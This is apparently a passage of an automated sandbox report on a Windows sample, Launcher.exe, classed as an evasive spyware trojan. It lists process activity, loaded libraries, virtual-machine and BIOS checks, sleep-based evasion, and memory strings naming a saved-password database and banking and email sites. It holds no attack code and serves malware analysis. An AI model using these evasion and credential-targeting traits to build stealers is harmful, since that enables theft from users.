                Source: C:\Users\user\Desktop\Launcher.exeCode function: String function: 009D41E0 appears 47 times
                Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2656 -s 600
                Source: Launcher.exe, 00000000.00000000.2046505180.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameRpcPing.exej% vs Launcher.exe
                Source: Launcher.exe, 00000000.00000002.2332293012.0000000002F4D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRpcPing.exej% vs Launcher.exe
                Source: Launcher.exe, 00000003.00000003.2053379149.0000000002A9A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRpcPing.exej% vs Launcher.exe
                Source: Launcher.exe, 00000003.00000000.2052950986.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameRpcPing.exej% vs Launcher.exe
                Source: Launcher.exeBinary or memory string: OriginalFilenameRpcPing.exej% vs Launcher.exe
                Source: Launcher.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Launcher.exeStatic PE information: Section: .bss ZLIB complexity 1.0003260869565218
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@5/5@11/2
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2448:120:WilError_03
                Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2656
                Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\9f9a98df-b877-4270-baef-182ab882fe89Jump to behavior
                Source: Launcher.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\Launcher.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: Launcher.exe, 00000003.00000003.2185123601.0000000003A0F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: Launcher.exeVirustotal: Detection: 44%
                Source: Launcher.exeReversingLabs: Detection: 39%
                Source: C:\Users\user\Desktop\Launcher.exeFile read: C:\Users\user\Desktop\Launcher.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\Launcher.exe "C:\Users\user\Desktop\Launcher.exe"
                Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Users\user\Desktop\Launcher.exe "C:\Users\user\Desktop\Launcher.exe"
                Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2656 -s 600
                Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Users\user\Desktop\Launcher.exe "C:\Users\user\Desktop\Launcher.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeSection loaded: aclayers.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeSection loaded: sfc.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeSection loaded: aclayers.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeSection loaded: sfc.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeSection loaded: webio.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: Launcher.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_ISOLATION, TERMINAL_SERVER_AWARE
                Source: Launcher.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: Launcher.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: Launcher.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: Launcher.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: Launcher.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\Launcher.exeCode function: 0_2_009D4303 push ecx; ret 0_2_009D4316
                Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_3_00F76DD8 push esi; ret 3_3_00F76DDA
                Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_3_00F76DD8 push esi; ret 3_3_00F76DDA
                Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_3_00F76DD8 push esi; ret 3_3_00F76DDA
                Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_3_00F76DD8 push esi; ret 3_3_00F76DDA
                Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_3_00F76DD8 push esi; ret 3_3_00F76DDA
                Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_3_00F76DD8 push esi; ret 3_3_00F76DDA
                Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_3_00F76DD8 push esi; ret 3_3_00F76DDA
                Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_3_00F76DD8 push esi; ret 3_3_00F76DDA
                Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_3_00F76DD8 push esi; ret 3_3_00F76DDA
                Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_3_00F76DD8 push esi; ret 3_3_00F76DDA
                Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_3_00F7C364 pushad ; ret 3_3_00F7C365
                Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_3_00F7C364 pushad ; ret 3_3_00F7C365
                Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_3_00F7C364 pushad ; ret 3_3_00F7C365
                Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_3_00F7C364 pushad ; ret 3_3_00F7C365
                Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_3_00F7C364 pushad ; ret 3_3_00F7C365
                Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_3_00F7C364 pushad ; ret 3_3_00F7C365
                Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_3_00F7C364 pushad ; ret 3_3_00F7C365
                Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_3_00F7C364 pushad ; ret 3_3_00F7C365
                Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_3_00F7C364 pushad ; ret 3_3_00F7C365
                Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_3_00F7C364 pushad ; ret 3_3_00F7C365
                Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_3_00F7CB64 pushad ; retf 3_3_00F7CB65
                Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_3_00F7CB64 pushad ; retf 3_3_00F7CB65
                Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_3_00F7CB64 pushad ; retf 3_3_00F7CB65
                Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_3_00F7CB64 pushad ; retf 3_3_00F7CB65
                Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_3_00F7CB64 pushad ; retf 3_3_00F7CB65
                Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_3_00F7CB64 pushad ; retf 3_3_00F7CB65
                Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_3_00F7CB64 pushad ; retf 3_3_00F7CB65
                Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_3_00F7CB64 pushad ; retf 3_3_00F7CB65
                Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_3_00F7CB64 pushad ; retf 3_3_00F7CB65
                Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_3_00F7CB64 pushad ; retf 3_3_00F7CB65
                Source: C:\Users\user\Desktop\Launcher.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: C:\Users\user\Desktop\Launcher.exeSystem information queried: FirmwareTableInformationJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-20859
                Source: C:\Users\user\Desktop\Launcher.exe TID: 5896Thread sleep time: -240000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exe TID: 5896Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: C:\Users\user\Desktop\Launcher.exeCode function: 0_2_009E63B5 FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_009E63B5
                Source: C:\Users\user\Desktop\Launcher.exeCode function: 0_2_009E6304 FindFirstFileExW,0_2_009E6304
                Source: Amcache.hve.6.drBinary or memory string: VMware
                Source: Launcher.exe, 00000003.00000003.2184553980.0000000003A30000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                Source: Launcher.exe, 00000003.00000003.2184553980.0000000003A30000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                Source: Launcher.exe, 00000003.00000003.2184553980.0000000003A30000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
                Source: Launcher.exe, 00000003.00000003.2184553980.0000000003A35000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696428655p
                Source: Launcher.exe, 00000003.00000003.2386728051.0000000000F90000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2318603921.0000000000F90000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2348803317.0000000000F90000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2482226766.0000000000F90000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2343011519.0000000000F90000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2183979276.0000000000F90000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2348231788.0000000000F90000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2346946917.0000000000F90000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2349091115.0000000000F90000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2343830924.0000000000F90000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2387068270.0000000000F90000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW<<;
                Source: Amcache.hve.6.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                Source: Launcher.exe, 00000003.00000003.2386728051.0000000000F90000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2318603921.0000000000F90000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2348803317.0000000000F90000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2482226766.0000000000F90000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2343011519.0000000000F90000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2183979276.0000000000F90000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2348231788.0000000000F90000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2346946917.0000000000F90000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2349091115.0000000000F90000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2343830924.0000000000F90000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2481834662.0000000000F43000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: Launcher.exe, 00000003.00000003.2184553980.0000000003A30000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                Source: Amcache.hve.6.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                Source: Launcher.exe, 00000003.00000003.2184553980.0000000003A30000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                Source: Amcache.hve.6.drBinary or memory string: vmci.sys
                Source: Launcher.exe, 00000003.00000003.2184553980.0000000003A30000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
                Source: Launcher.exe, 00000003.00000003.2184553980.0000000003A30000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
                Source: Launcher.exe, 00000003.00000003.2184553980.0000000003A30000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                Source: Launcher.exe, 00000003.00000003.2184553980.0000000003A30000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
                Source: Launcher.exe, 00000003.00000003.2184553980.0000000003A30000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                Source: Launcher.exe, 00000003.00000003.2184553980.0000000003A35000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: YNVMware
                Source: Amcache.hve.6.drBinary or memory string: VMware20,1
                Source: Amcache.hve.6.drBinary or memory string: Microsoft Hyper-V Generation Counter
                Source: Amcache.hve.6.drBinary or memory string: NECVMWar VMware SATA CD00
                Source: Amcache.hve.6.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                Source: Launcher.exe, 00000003.00000003.2184553980.0000000003A30000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                Source: Amcache.hve.6.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                Source: Amcache.hve.6.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                Source: Amcache.hve.6.drBinary or memory string: VMware PCI VMCI Bus Device
                Source: Amcache.hve.6.drBinary or memory string: VMware VMCI Bus Device
                Source: Amcache.hve.6.drBinary or memory string: VMware Virtual RAM
                Source: Amcache.hve.6.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                Source: Launcher.exe, 00000003.00000003.2184553980.0000000003A30000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
                Source: Launcher.exe, 00000003.00000003.2184553980.0000000003A30000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                Source: Amcache.hve.6.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                Source: Launcher.exe, 00000003.00000003.2184553980.0000000003A30000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                Source: Amcache.hve.6.drBinary or memory string: VMware Virtual USB Mouse
                Source: Amcache.hve.6.drBinary or memory string: vmci.syshbin
                Source: Amcache.hve.6.drBinary or memory string: VMware, Inc.
                Source: Launcher.exe, 00000003.00000003.2184553980.0000000003A30000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
                Source: Amcache.hve.6.drBinary or memory string: VMware20,1hbin@
                Source: Amcache.hve.6.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                Source: Amcache.hve.6.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                Source: Launcher.exe, 00000003.00000003.2184553980.0000000003A30000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                Source: Amcache.hve.6.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                Source: Launcher.exe, 00000003.00000003.2184553980.0000000003A30000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                Source: Launcher.exe, 00000003.00000003.2184553980.0000000003A30000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                Source: Launcher.exe, 00000003.00000003.2184553980.0000000003A30000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                Source: Launcher.exe, 00000003.00000003.2184553980.0000000003A30000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                Source: Amcache.hve.6.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                Source: Launcher.exe, 00000003.00000003.2184553980.0000000003A30000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                Source: Launcher.exe, 00000003.00000003.2184553980.0000000003A30000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
                Source: Launcher.exe, 00000003.00000003.2184553980.0000000003A30000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                Source: Amcache.hve.6.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                Source: Launcher.exe, 00000003.00000003.2184553980.0000000003A30000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                Source: Launcher.exe, 00000003.00000003.2184553980.0000000003A30000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
                Source: Launcher.exe, 00000003.00000003.2184553980.0000000003A30000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                Source: Launcher.exe, 00000003.00000003.2184553980.0000000003A30000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
                Source: Amcache.hve.6.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                Source: Amcache.hve.6.drBinary or memory string: vmci.syshbin`
                Source: Launcher.exe, 00000003.00000003.2184553980.0000000003A30000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                Source: Amcache.hve.6.drBinary or memory string: \driver\vmci,\driver\pci
